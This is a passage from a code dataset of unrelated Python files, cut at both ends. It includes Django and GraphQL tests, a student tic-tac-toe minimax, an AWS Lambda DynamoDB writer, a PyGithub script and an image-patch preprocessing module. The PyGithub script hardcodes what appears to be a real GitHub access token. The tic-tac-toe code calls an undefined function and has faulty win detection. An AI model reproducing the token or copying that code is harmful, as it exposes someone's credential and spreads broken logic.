\"store\"}',\n },\n }\n result = schema.execute(query)\n assert not result.errors\n assert result.data == expected\n\n\ndef test_should_node():\n class ReporterNode(DjangoNode):\n\n class Meta:\n model = Reporter\n\n @classmethod\n def get_node(cls, id, info):\n return ReporterNode(Reporter(id=2, first_name='Cookie Monster'))\n\n def resolve_articles(self, *args, **kwargs):\n return [ArticleNode(Article(headline='Hi!'))]\n\n class ArticleNode(DjangoNode):\n\n class Meta:\n model = Article\n\n @classmethod\n def get_node(cls, id, info):\n return ArticleNode(Article(id=1, headline='Article node', pub_date=datetime.date(2002, 3, 11)))\n\n class Query(graphene.ObjectType):\n node = relay.NodeField()\n reporter = graphene.Field(ReporterNode)\n article = graphene.Field(ArticleNode)\n\n def resolve_reporter(self, *args, **kwargs):\n return ReporterNode(\n Reporter(id=1, first_name='ABA', last_name='X'))\n\n query = '''\n query ReporterQuery {\n reporter {\n id,\n firstName,\n articles {\n edges {\n node {\n headline\n }\n }\n }\n lastName,\n email\n }\n myArticle: node(id:\"QXJ0aWNsZU5vZGU6MQ==\") {\n id\n ... on ReporterNode {\n firstName\n }\n ... on ArticleNode {\n headline\n pubDate\n }\n }\n }\n '''\n expected = {\n 'reporter': {\n 'id': 'UmVwb3J0ZXJOb2RlOjE=',\n 'firstName': 'ABA',\n 'lastName': 'X',\n 'email': '',\n 'articles': {\n 'edges': [{\n 'node': {\n 'headline': 'Hi!'\n }\n }]\n },\n },\n 'myArticle': {\n 'id': 'QXJ0aWNsZU5vZGU6MQ==',\n 'headline': 'Article node',\n 'pubDate': '2002-03-11',\n }\n }\n schema = graphene.Schema(query=Query)\n result = schema.execute(query)\n assert not result.errors\n assert result.data == expected\n","repo_name":"amir17688/google_data_p2","sub_path":"67006_test_query.py_C__Users_user_Desktop_data_2_data_google_data_graphql-pytho.py","file_name":"67006_test_query.py_C__Users_user_Desktop_data_2_data_google_data_graphql-pytho.py","file_ext":"py","file_size_in_byte":5090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71202268089","text":"\"\"\"\nTic Tac Toe Player\n\"\"\"\n\nimport math\nimport copy\n\nX = \"X\"\nO = \"O\"\nEMPTY = None\n\ndef initial_state():\n \"\"\"\n Returns starting state of the board.\n \"\"\"\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]\n\ndef player(board):\n \"\"\"\n Returns player who has the next turn on a board.\n \"\"\"\n count = 0\n for row in board:\n count += row.count(X) + row.count(O)\n return O if count % 2 == 1 else X\n\ndef actions(board):\n \"\"\"\n Returns set of all possible actions (i, j) available on the board.\n \"\"\"\n actions = set()\n for row_index, row in enumerate(board):\n for cell_index, cell in enumerate(row):\n if cell is None:\n actions.add((row_index, cell_index))\n return actions\n\ndef result(board, action):\n \"\"\"\n Returns the board that results from making move (i, j) on the board.\n \"\"\"\n row_index = action[0]\n cell_index = action[1]\n if board[row_index][cell_index] is not None:\n raise NameError(\"NotValidMoveError\")\n new_board = copy.deepcopy(board)\n new_board[row_index][cell_index] = player(new_board)\n return new_board\n\ndef winner(board):\n \"\"\"\n Returns the winner of the game, if there is one.\n \"\"\"\n if (board[0][0] == X and board[2][2] == X) and board[1][1] == X or (board[0][2] == X and board[2][0] == X) and board[1][1] == X:\n return X\n elif (board[0][0] == O and board[2][2] == O) and board[1][1] == O or (board[0][2] == O and board[2][0] == O) and board[1][1] == O:\n return O\n for i in range(0,2):\n for row in board:\n if all(row[i] == X or cell == X for cell in row for row in board):\n return X\n elif all(row[i] == O or cell == O for cell in row for row in board):\n return O\n return None\n\ndef terminal(board):\n \"\"\"\n Returns True if game is over, False otherwise.\n \"\"\"\n if winner(board) == X or winner(board) == O:\n \n return True\n for row in board:\n if any(cell == None for cell in row):\n return False\n return True\n\ndef utility(board):\n \"\"\"\n Returns 1 if X has won the game, -1 if O has won, 0 otherwise.\n \"\"\"\n return 1 if winner(board) == X else -1 if winner(board) == O else 0\n\ndef min_value(board):\n if terminal(board):\n return utility(board)\n v = 10000\n for action in actions(board):\n v = min(v, max_value(result(board, action)))\n return v\n\ndef p(board):\n if terminal(board):\n return utility(board)\n v = -10000\n for action in actions(board):\n v = max(v, min_value(result(board, action)))\n return v\n\ndef minimax(board):\n \"\"\"\n Returns the optimal action for the current player on the board.\n \"\"\"\n \n if terminal(board):\n return None\n if board == initial_state():\n return (1,1) \n scores = []\n action_list = []\n for action in actions(board):\n if player(board) == X:\n print('X')\n scores.append(min_value(result(board, action))) \n elif player(board) == O:\n print('O')\n scores.append(max_value(result(board, action)))\n action_list.append(action)\n print(scores, action_list)\n if player(board) == X:\n return action_list[scores.index(max(scores))] \n elif player(board) == O:\n return action_list[scores.index(min(scores))] \nprint(minimax(initial_state()))","repo_name":"becomingmountains/CS50-ai","sub_path":"tictactoe/tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6484892574","text":"from django.db import transaction\n\n\nclass UnpackIdsMixin:\n \"\"\"\n Mixin to apply on a ModelViewSet which transform registered fields from string containing ids to list of objects\n \"1,2,3\" => [, , ]\n or\n \"1,2,3\" => [1, 2, 3]\n\n Should define unpackable fields like this :\n unpack to [{'id': 1}, {'id': 2}, {'id': 3}]\n unpackable_fields = ('data_field_name',)\n\n unpack to [1, 2, 3] :\n unpackable_fields = {'data_field_name': {'flat': True}}\n \"\"\"\n\n unpackable_fields = ()\n\n def get_item_id(self, word, options):\n \"\"\"\n If given tag contain only digits, use it as id\n \"\"\"\n if word.isdigit():\n item_id = int(word)\n if isinstance(options, dict) and options.get(\"flat\"):\n return item_id\n return {\"id\": item_id}\n return None\n\n def __unpack_field__(self, data, field_name):\n \"\"\"\n Split value and replace field value by list of instances\n \"\"\"\n value = data.get(field_name, None)\n if not isinstance(value, str):\n return # If not string do not do anything\n options = None\n if isinstance(self.unpackable_fields, dict):\n options = self.unpackable_fields.get(field_name)\n word_list = value.split(\",\")\n items = []\n for word in word_list:\n item_id = self.get_item_id(word, options)\n if item_id:\n items.append(item_id)\n data[field_name] = items\n\n def __unpack_fields__(self, data):\n for field_name in self.unpackable_fields:\n self.__unpack_field__(data, field_name)\n\n def create(self, request, *args, **kwargs):\n with transaction.atomic(): # If object create fail rollback any tags creation\n self.__unpack_fields__(request.data)\n return super(UnpackIdsMixin, self).create(request, *args, **kwargs)\n\n def update(self, request, *args, **kwargs):\n with transaction.atomic(): # If object create fail rollback any tags creation\n self.__unpack_fields__(request.data)\n return super(UnpackIdsMixin, self).update(request, *args, **kwargs)\n","repo_name":"alexandrenorman/mixeur","sub_path":"helpers/mixins/unpack_ids_mixin.py","file_name":"unpack_ids_mixin.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12523054867","text":"from github import Github\nimport yaml\nimport os\n# credentials.yml contains your usr/repo and PAT created in step 11 above\n# So we load the data into a YML object\ndata = yaml.safe_load(open('amec0001_credentials.yml'))\n# Extract the user and token from the data object\n# 0. Complete these 2 lines below\nuser = 'amechukwu'\ntoken = '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'\n# using an access token\ng = Github(token)\nrepo = g.get_repo(user)\n## Complete your tasks from here\n# 1. Get all branches you have created for your public repo\n\nrepo = g.get_repo(\"PyGithub/PyGithub\")\nlist(repo.get_branches())\n\n\n# 2. Get all pull requests you have created\n\nrepo = g.get_repo(\"PyGithub/PyGithub\")\npr = repo.get_pull(664)\npr\n\n\n# 3. Get a list of commits you have created in your `main` branch.\n\ncommit = repo.get_commit(sha=sha)\nprint(commit.commit.author.date)\nprint(commit.commit.committer.date)\n\n\n","repo_name":"amechukwu/DevOps1","sub_path":"obi.py","file_name":"obi.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6562136039","text":"import json\nfrom decimal import Decimal\nimport boto3\n\ndef lambda_handler(event, context):\n dynamodb = boto3.resource('dynamodb', region_name='eu-central-1')\n table = dynamodb.Table('transactions')\n\n # Check if the event comes from API Gateway\n if 'body' in event:\n event = json.loads(event['body'])\n try:\n transaction_id = event['transaction_id']\n user_id = event['user_id']\n creation_date = event['creation_date']\n product_id = event['product_id']\n num_items = event['num_items']\n transaction_status = event['transaction_status']\n except KeyError as e:\n return {\n 'statusCode': 400,\n 'body': json.dumps(f'Missing required input: {str(e)}')\n }\n\n try:\n response = table.put_item(\n Item={\n 'transaction_id': transaction_id,\n 'user_id': user_id,\n 'creation_date': creation_date,\n 'num_items' : num_items,\n 'product_id': product_id,\n 'transaction_status': transaction_status\n }\n )\n except Exception as e:\n return {\n 'statusCode': 500,\n 'body': json.dumps(f'Error putting item to DynamoDB: {str(e)}')\n }\n\n return {\n 'statusCode': 200,\n 'body': json.dumps('Transaction added to the database!')\n }\n","repo_name":"sidoncloud/aws-de-usecases","sub_path":"UseCase-Lambda-Dynamo/lambda_dynamo_write.py","file_name":"lambda_dynamo_write.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15839644759","text":"from _typeshed import Incomplete\n\nMODE_GENERIC: Incomplete\nMODE_TEXT: Incomplete\nMODE_FONT: Incomplete\nCompressor: Incomplete\nDecompressor: Incomplete\n\ndef compress(string, mode=..., quality: int = ..., lgwin: int = ..., lgblock: int = ...): ...\n\ndecompress: Incomplete\nerror: Incomplete\n","repo_name":"youwol/py-youwol","sub_path":".typing_stubs/brotli.pyi","file_name":"brotli.pyi","file_ext":"pyi","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"71223263289","text":"#!/usr/bin/env python3\n# -*- encoding: utf-8 -*-\n'''\n@File : utils.py\n@Time : 2022/08/15 14:43:12\n@Author : julianarhee \n@Contact : juliana.rhee@gmail.com\n'''\n\nimport re\nimport os\nimport glob\n\n# ---------------------------------------------------------------------\n# General\n# ---------------------------------------------------------------------\nnatsort = lambda s: [int(t) if t.isdigit() \\\n else t.lower() for t in re.split('(\\d+)', s)]\n\ndef flatten(t):\n return [item for sublist in t for item in sublist]\n\n\n# ---------------------------------------------------------------------\n# File tree \n# ---------------------------------------------------------------------\ndef print_and_select_session(rootdir='/Volumes/My Book/bandensis-dyad'):\n '''\n Print all sessions found in , then allow user to select by index.\n\n Keyword Arguments:\n rootdir -- path to parent dir of all sessions (default: {'/Volumes/My Book/bandensis-dyad'})\n\n Returns:\n full path to video source dir\n '''\n src_dirs = sorted(glob.glob(os.path.join(rootdir, '2022*')), \\\n key=natsort)\n for i, sdir in enumerate(src_dirs):\n print(\"{}: {}\".format(i, os.path.split(sdir)[-1]))\n\n session_idx = int(input(\"Select IX of session to trim: \"))\n src_dir = src_dirs[session_idx]\n\n return src_dir #session\n\n","repo_name":"julianarhee/xad-analyses","sub_path":"preprocessing/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74180431287","text":"import torch\nimport torch.nn as nn\n\nimport torch.onnx\n\n\nclass CenterLoss(nn.Module):\n \"\"\"Center loss.\n Reference:\n Wen et al. A Discriminative Feature Learning Approach for Deep Face Recognition. ECCV 2016.\n Args:\n num_classes (int): number of classes.\n feat_dim (int): feature dimension.\n \"\"\"\n\n def __init__(self, num_classes=751, feat_dim=2048, use_gpu=True, ckpt=None, centroids=None):\n super(CenterLoss, self).__init__()\n self.num_classes = num_classes\n self.feat_dim = feat_dim\n self.use_gpu = use_gpu\n self.ckpt = ckpt\n\n if self.use_gpu:\n self.centers = nn.Parameter(torch.randn(self.num_classes, self.feat_dim, device=\"cuda\"))\n else:\n self.centers = nn.Parameter(torch.randn(self.num_classes, self.feat_dim))\n if ckpt:\n self.load(centroids)\n\n def load(self, centroids=None):\n ckpt_centers = torch.load(self.ckpt)\n ckpt_classes = ckpt_centers.size(0)\n self.centers = nn.Parameter(torch.cat((ckpt_centers,\n torch.randn(self.num_classes - ckpt_classes, self.feat_dim,\n device=\"cuda\") if centroids is None else centroids.cuda()),\n dim=0))\n\n def save(self):\n torch.save(self.centers, \"center_ckpt.pt\")\n\n def forward(self, x, labels, weights=None):\n \"\"\"\n Args:\n x: feature matrix with shape (batch_size, feat_dim).\n labels: ground truth labels with shape (num_classes).\n \"\"\"\n assert x.size(0) == labels.size(0), \"features.size(0) is not equal to labels.size(0)\"\n\n batch_size = x.size(0)\n distmat = torch.pow(x, 2).sum(dim=1, keepdim=True).expand(batch_size, self.num_classes) + \\\n torch.pow(self.centers, 2).sum(dim=1, keepdim=True).expand(self.num_classes, batch_size).t()\n distmat.addmm_(1, -2, x, self.centers.t())\n\n classes = torch.arange(self.num_classes).long()\n if self.use_gpu: classes = classes.cuda()\n labels = labels.unsqueeze(1).expand(batch_size, self.num_classes)\n mask = labels.eq(classes.expand(batch_size, self.num_classes))\n\n dist = distmat * mask.float()\n dist = dist.clamp(min=1e-12, max=1e+12)\n indices = torch.zeros(batch_size, dtype=torch.int32)\n for i in range(batch_size):\n value = distmat[i][mask[i]]\n if value.detach().cpu().numpy():\n indices[i] = 1\n if weights is not None:\n dist = dist * weights[indices == 1]\n loss = dist.sum()\n else:\n loss = dist.sum() / batch_size\n return loss\n","repo_name":"SuperbTUM/real-time-ReID-tracking","sub_path":"reid/losses/center_losses.py","file_name":"center_losses.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"17595518001","text":"\"\"\"\n\n41.\nHard\n\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def firstMissingPositive(self, nums: List[int]) -> int:\n n = len(nums)\n \n # expected: 1 to n\n count_in_range = 0\n min_elem, max_elem = n, 1\n \n for num in nums:\n if 1 <= num <= n:\n min_elem = min(min_elem, num)\n max_elem = max(max_elem, num)\n count_in_range += 1\n \n if count_in_range == 0:\n return 1\n \n # if count_in_range == n and min_elem == 1 and max_elem == n:\n # return n + 1\n \n for i in range(n):\n if nums[i] == i + 1:\n nums[i] = 'v'\n \n \n elif nums[i] != 'v' and 1 <= nums[i] <= n:\n next_pos = nums[i] - 1\n \n while nums[next_pos] != 'v' and 1 <= nums[next_pos] <= n:\n temp = nums[next_pos]\n nums[next_pos] = 'v'\n next_pos = temp - 1\n \n # previous position is a valid number. therefore the current position needs to be marked\n if nums[next_pos] != 'v':\n nums[next_pos] = 'v'\n if nums[i] != 'v':\n nums[nums[i] - 1] = 'v'\n \n # print(nums)\n \n for i in range(n):\n if nums[i] != 'v':\n return i + 1\n \n return n + 1\n\n def firstMissingPositive2(self, nums: List[int]) -> int:\n\n n = len(nums)\n if 1 not in nums:\n return 1\n \n # replace <= 0\n for i in range(n):\n if nums[i] <= 0:\n nums[i] = 1\n \n # mark the elements that are present\n for i in range(n):\n index = abs(nums[i]) - 1\n if index < n:\n nums[index] = - abs(nums[index])\n \n for i in range(n):\n if nums[i] > 0:\n return i + 1\n return n + 1\n \n\nif __name__=='__main__':\n\n sol = Solution()\n\n cases = [\n (sol.firstMissingPositive, ([2,1], ), 3),\n (sol.firstMissingPositive, ([-1,4,2,1,9,10], ), 3),\n (sol.firstMissingPositive, ([0,1,2], ), 3),\n (sol.firstMissingPositive, ([1,1], ), 2),\n (sol.firstMissingPositive, ([3,1], ), 2),\n (sol.firstMissingPositive, ([1,1,1], ), 2),\n (sol.firstMissingPositive, ([1], ), 2),\n \n ]\n\n for i, (func, case, expected) in enumerate(cases):\n ans = func(*case)\n if ans == expected:\n print(\"Case {:d} Passed\".format(i + 1))\n else:\n print(\"Case {:d} Failed; Expected {:s} != {:s}\".format(i+1, str(expected), str(ans)))","repo_name":"xys234/coding-problems","sub_path":"algo/array/find_first_missing_positive.py","file_name":"find_first_missing_positive.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19688749568","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Created by Z Lei on 2019-10-05.\n\n\nclass Bucket:\n\n def __init__(self, m=None, M=None, is_empty=True):\n self.m = m\n self.M = M\n self.is_empty = is_empty\n\n def __repr__(self):\n return f\"({self.m} | {self.M} | {self.is_empty})\"\n\n\ndef max_sr(array):\n if len(array) <= 1:\n return 0\n\n buckets = [Bucket() for i in range(len(array) + 1)]\n\n m_value = 0\n M_value = 0\n\n m_value = min(array)\n M_value = max(array)\n\n if m_value == M_value:\n return 0\n\n split = (M_value - m_value) // (len(array) + 1)\n print(split)\n for num in array:\n\n index = int((num - m_value)* len(array) / (M_value - m_value) )\n\n if buckets[index].is_empty:\n buckets[index].m = num\n buckets[index].M = num\n buckets[index].is_empty = False\n\n else:\n buckets[index].m = min(num, buckets[index].m)\n buckets[index].M = max(num, buckets[index].M)\n\n print(buckets[index])\n res = 0\n\n pre_max = buckets[0].M\n print(buckets)\n for i in range(1, len(buckets)):\n if not buckets[i].is_empty:\n res = max(res, buckets[i].m - pre_max)\n pre_max = buckets[i].M\n return res\n\n\nprint(max_sr([15252,16764,27963,7817,26155,20757,3478,22602,20404,6739,16790,10588,16521,6644,20880,15632,27078,25463,20124,15728,30042,16604,17223,4388,23646,32683,23688,12439,30630,3895,7926,22101,32406,21540,31799,3768,26679,21799,23740]))\n","repo_name":"Zidoing/programer_interview_guide","sub_path":"MAX.py","file_name":"MAX.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23469256742","text":"import sys\nimport math\n\nN = int(input())\narr = list(map(int,sys.stdin.readline().rstrip().split())) #arr에 저장\ncheck = [False]*N\nmain, sub = map(int,input().split()) #메인 체크인원\ncnt=0\nfor i in range(len(arr)):\n arr[i]-=main\n if arr[i]<0:\n arr[i]=0\n cnt+=1\nfor i in range(len(arr)):\n if arr[i]<=0:\n continue\n #div = math.ceil(arr[i]/sub)\n div = arr[i]//sub\n temp = arr[i]%sub\n if temp!=0:\n div+=1\n arr[i]=div\n\nfor i in range(len(arr)):\n cnt+=arr[i]\nprint(cnt)\n","repo_name":"SeokgyuHong/personal_study","sub_path":"코딩테스트문제풀이/삼성역량/시험감독.py","file_name":"시험감독.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21882670577","text":"import imp\nfrom django.urls import include, path\nfrom .views import *\n\nurlpatterns = [\n path('', GetProductDetailView.as_view(),\n name='get_product_detail'),\n\n path('all', GetProductsListView.as_view(), name=\"get_products_list\"),\n path('add', CreateProductView.as_view(), name=\"add_product\"),\n path('category', CreateProductCategoryView.as_view(),\n name=\"get_product_category\"),\n path('rating/update', SetProductRating.as_view(),\n name=\"update_product_rating\"),\n path('image/upload', CreateListProductImagesView.as_view(),\n name=\"get_add_product_images\"),\n path('add-to-db', AddProductsToDBView.as_view(),\n name=\"add_products_to_db\")\n\n\n\n]\n","repo_name":"arunkumarchauhan/neostore_backend","sub_path":"neostore_backend_project/product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19869393829","text":"from random import randint\nfrom time import time\nfrom quick_sort_rand import quickSortRand\nfrom quick_sort import quickSort\nfrom quick_sort_mid import quickSortMid\nimport matplotlib.pyplot as plt\nimport numpy\n\nrandomTimes = []\nfirstElementTimes = []\nmidElementTimes = []\n\nfor i in range(1000):\n L = [randint(0, 100) for i in range(1000)]\n \n # run the random pivot quick sorter\n t = time()\n quickSortRand(L)\n randomTimes.append(time() - t)\n \n # run the first element quick sorter\n t = time()\n quickSort(L)\n firstElementTimes.append(time() - t)\n \n # run the mid element quick sorter\n t = time()\n quickSortMid(L)\n midElementTimes.append(time() - t)\n \n \nplt.title(\"Sort Time Histogram\")\nplt.xlabel(\"Sort Time\")\nplt.ylabel(\"Run Count\")\n\nbins = numpy.linspace(0, 0.02, 100)\n\nplt.hist(randomTimes, bins, alpha=0.5, label='Random Pivot')\nplt.hist(midElementTimes, bins, alpha=0.5, label='Middle Element Pivot')\nplt.hist(firstElementTimes, bins, alpha=0.5, label='First Element Pivot')\nplt.legend(loc='upper right')\n\nplt.show()","repo_name":"rosskipp/grokking-algorithms","sub_path":"ch4/sort_timer.py","file_name":"sort_timer.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9191707825","text":"import os\nimport re\nimport numpy as np\nfrom PIL import Image\nfrom glob import glob\nimport shutil\nimport rasterio\n\nfrom definitions import channels_matrix, reset_dir\n\ndef preprocessTrainData(configuration, output_dir):\n \"\"\"\n This function takes in a configuration data object and based on its parameters, it processes image data,\n dividing the input raster images into smaller patches, saving them into a directory, and applying data augmentation if required.\n\n Args:\n configuration (dict): A configuration dictionary that contains the following keys:\n - 'datasets': List of dataset names to be processed.\n - 'resolutions': List of resolution levels to be considered.\n - 'channels': Channels to be included in the output.\n - 'image_size': The desired output patch size.\n - 'augment': Boolean flag indicating whether data augmentation should be performed.\n\n \"\"\"\n\n # Reset and get the path to the output directory\n output_directory = reset_dir(output_dir)\n\n # Loop over each dataset and resolution in the configuration\n for dataset in configuration['datasets']:\n for resolution in configuration['resolutions']:\n resolution = str(resolution).replace('.', ',')\n \n # Create a specific destination path for each dataset and resolution\n specific_destination = os.path.join(output_directory, f'{dataset}_{resolution}')\n \n # Create directory if not exists\n os.makedirs(specific_destination, exist_ok=True)\n\n # Open the raster image file and stack it into a 3D numpy array\n raster = np.stack(rasterio.open(os.path.join('dataset', resolution, f'{dataset}.tif')).read(), axis=2)\n \n # For each channel in the configuration, create patches and save them\n for channel in configuration['channels']:\n patches = createImagePatches(raster[:,:,channels_matrix.index(channel)], configuration['image_size'])\n savePatches(patches, specific_destination, name=channel)\n\n # Open the ground truth raster image, create patches and save them\n rastertruth = rasterio.open(os.path.join(os.getcwd(), 'dataset truth', resolution, f'{dataset}.tif')).read(1)\n patches = createImagePatches(rastertruth, configuration['image_size'])\n savePatches(patches, specific_destination, name='truth')\n\n # Delete all empty 'truth.png' files in the output directory\n deleteEmptyFiles(output_directory, 'truth.png')\n\n # If the configuration specifies data augmentation, perform it\n if configuration['augment']:\n augmentDatasetWithRotation(output_directory)\n\ndef preprocessTestData(raster, confData, pas, output_directory='test_examples', channelToPermute=False):\n \"\"\"\n This function is used to preprocess the test data.\n\n Args:\n raster (str): The raster file to preprocess\n confData (dict): The configuration data which contains channels and image size.\n pas (int): The step size for moving the window to create patches.\n output_directory (str): path to directory where examples will be store.\n channelToPermute (bool): Whether to permute a channel. Default is False.\n\n Returns:\n None\n \"\"\"\n # Reset the output directory\n output_directory = reset_dir(output_directory)\n\n # Stack the raster data\n raster = np.stack(raster.read(), axis=2)\n \n # For each channel in the configuration data\n for channel in confData['channels'] :\n \n # Create image patches\n patchs = createImageTestPatches(raster[:,:,channels_matrix.index(channel)], confData['image_size'], int(pas))\n \n # Save the patches to the output directory\n savePatches(patchs, output_directory, name=channel, channelToPermute = channel if channel == channelToPermute else False)\n\ndef createImagePatches(dataset_raster, patch_size):\n \"\"\"\n This function takes a raster dataset and a patch size, then divides the dataset into patches of the given size.\n Patches are created in a grid pattern starting from the top-left. Padding is added where necessary.\n\n Args:\n dataset_raster (numpy.ndarray): The input 2D raster image to be divided into patches.\n patch_size (int): The size of the square patches to be created.\n\n Returns:\n numpy.ndarray: A 4D array where the first two dimensions are the patch indices, and the last two dimensions are the patch content.\n \"\"\"\n\n # Initialize an empty array to store the patches\n patches = np.empty((dataset_raster.shape[1]//patch_size + 1, dataset_raster.shape[0]//patch_size + 1, patch_size, patch_size))\n\n # Loop over the raster image creating patches\n for h in range(0, dataset_raster.shape[0]//patch_size):\n for w in range(0, dataset_raster.shape[1]//patch_size):\n patch = dataset_raster[h*patch_size:h*patch_size+patch_size, w*patch_size:w*patch_size+patch_size] \n patches[w,h,:,:] = patch\n\n # Handle padding for remaining part in width\n remaining_width = patch_size - dataset_raster.shape[1]%patch_size\n w = dataset_raster.shape[1]//patch_size\n for h in range(0, dataset_raster.shape[0]//patch_size):\n patch = dataset_raster[h*patch_size:h*patch_size+patch_size, w*patch_size:w*patch_size+patch_size]\n patch = np.pad(patch, ((0,0), (0,remaining_width)))\n patches[w,h,:,:] = patch\n\n # Handle padding for remaining part in height\n remaining_height = patch_size - dataset_raster.shape[0]%patch_size\n h = dataset_raster.shape[0]//patch_size\n for w in range(0, dataset_raster.shape[1]//patch_size):\n patch = dataset_raster[h*patch_size:h*patch_size+patch_size, w*patch_size:w*patch_size+patch_size]\n patch = np.pad(patch, ((0,remaining_height), (0,0)))\n patches[w,h,:,:] = patch\n\n # Handle padding for the bottom right corner\n h = dataset_raster.shape[0]//patch_size\n w = dataset_raster.shape[1]//patch_size\n patch = dataset_raster[h*patch_size:h*patch_size+patch_size, w*patch_size:w*patch_size+patch_size]\n patch = np.pad(patch, ((0,remaining_height), (0,remaining_width)))\n patches[w,h,:,:] = patch\n\n return patches\n\ndef createImageTestPatches(dataset_raster, size, pas):\n \"\"\"\n This function creates image patches from the given raster dataset for testing.\n\n Args:\n dataset_raster (np.array): The raster data of the image in the form of a numpy array.\n size (int): The size of the patches to be created.\n pas (int): The step size for moving the window to create patches.\n\n Returns:\n np.array: A numpy array containing the image patches.\n \"\"\"\n # Create an empty numpy array to store the patches\n patchs = np.empty((dataset_raster.shape[1] // pas, dataset_raster.shape[0] // pas, size, size))\n\n # Iterate over the raster data to create patches\n for w in range(patchs.shape[0]):\n for h in range(patchs.shape[1]):\n # Get a patch from the raster data\n patch = dataset_raster[h*pas:h*pas+size, w*pas:w*pas+size]\n # If the patch size is not as expected, pad it to make it of the desired size\n if patch.shape[0] != size or patch.shape[1] != size : \n patch = np.pad(patch, ((0, size-patch.shape[0]), (0, size-patch.shape[1])))\n # Store the patch in the patches array\n patchs[w, h, :, :] = patch\n\n return patchs\n\n\ndef savePatches(patches, destination, name, channelToPermute=False):\n \"\"\"\n This function takes a 4D array of patches, a destination directory, a name, and a boolean flag for channel permutation.\n It then normalizes and optionally permutes the patches, and saves them as PNG images in the specified directory.\n\n Args:\n patches (numpy.ndarray): A 4D array where the first two dimensions are the patch indices, and the last two dimensions are the patch content.\n destination (str): The output directory where the patches should be saved.\n name (str): The base name of the output files.\n permute (bool, optional): A flag indicating whether to permute the channels of the patches. Defaults to False.\n\n \"\"\"\n\n # Loop over each patch\n for w in range(patches.shape[0]):\n for h in range(patches.shape[1]):\n \n # Create a new directory for each patch if it does not exist\n path = os.path.join(destination, f'{w}_{h}')\n if not os.path.exists(path): \n os.mkdir(path) \n\n # Normalize and optionally permute the patch\n patch = patches[w,h,:,:]\n patch = normalize(patch, name)\n patch = permuteImageChannel(patch) if channelToPermute == name else patch\n \n # Convert the patch to an image and save it\n patch_img = Image.fromarray(patch * 255).convert('L')\n patch_img.save(os.path.join(path, f'{name}.png'))\n\ndef loadPatches(confData, directory=\"test_examples\"):\n \"\"\"\n This function is used to load the image patches.\n\n Args:\n directory (str): The directory where the image patches are located.\n confData (dict): The configuration data which contains channels.\n\n Returns:\n np.array: A numpy array containing all the image patches.\n \"\"\"\n # Initialize a dictionary to store the patches\n patches_dict = {}\n\n # Get a list of all the subdirectories in the directory\n subdirectories = [d for d in os.listdir(directory) if os.path.isdir(os.path.join(directory, d))]\n\n # Iterate over each subdirectory\n for subdirectory in subdirectories:\n # Extract the width and height indices from the subdirectory name\n w, h = map(int, re.match(r'(\\d+)_(\\d+)', subdirectory).groups())\n\n # Initialize a dictionary to store the patches for this subdirectory\n patches_subdict = {}\n\n # Iterate over each channel\n for channel in confData['channels']:\n # Open the image file\n img = Image.open(os.path.join(directory, subdirectory, f'{channel}.png'))\n\n # Convert the image into a numpy array\n img_arr = np.array(img)\n\n # Add the image array to the patches subdictionary\n patches_subdict[channel] = img_arr\n\n # Convert the patches subdictionary to a multi-channel numpy array and add it to the patches dictionary\n patches_dict[(w, h)] = np.dstack(list(patches_subdict.values()))\n\n # Calculate the dimensions of the output array\n max_w = max(key[0] for key in patches_dict.keys()) + 1\n max_h = max(key[1] for key in patches_dict.keys()) + 1\n patch_size = list(patches_dict.values())[0].shape\n\n # Initialize an empty array to store the patches\n patches = np.empty((max_w, max_h, *patch_size))\n\n # Assign each patch to its position in the output array\n for (w, h), patch in patches_dict.items():\n patches[w, h, :, :, :] = patch\n\n return patches\n\ndef deleteEmptyFiles(directory, filename):\n \"\"\"\n This function checks all subdirectories of the provided directory for a file with the provided name.\n If the file is found and its content sums to zero (indicating it is an empty image), the containing directory is removed.\n\n Args:\n directory (str): The path of the directory to check.\n filename (str): The name of the file to check for.\n\n \"\"\"\n\n # Loop over all subdirectories in the specified directory\n for subdir in glob(directory + '//*//*'):\n # Open the file, if it exists, and normalize its content\n image = np.array(Image.open(os.path.join(subdir, filename))) / 255\n\n # If the sum of the image's content is zero (indicating an empty image), remove the containing directory\n if image.sum() == 0:\n shutil.rmtree(subdir)\n\ndef normalize(chunk, name):\n \"\"\"\n This function normalizes an array (a chunk of an image) based on its type, indicated by the provided name.\n It either scales the data to the range [0, 1] by dividing by the maximum value, or it scales and shifts the data to the range [0, 1] by subtracting the minimum value and dividing by the range.\n If all the values in the chunk are zero, it is returned as is.\n\n Args:\n chunk (numpy.ndarray): The 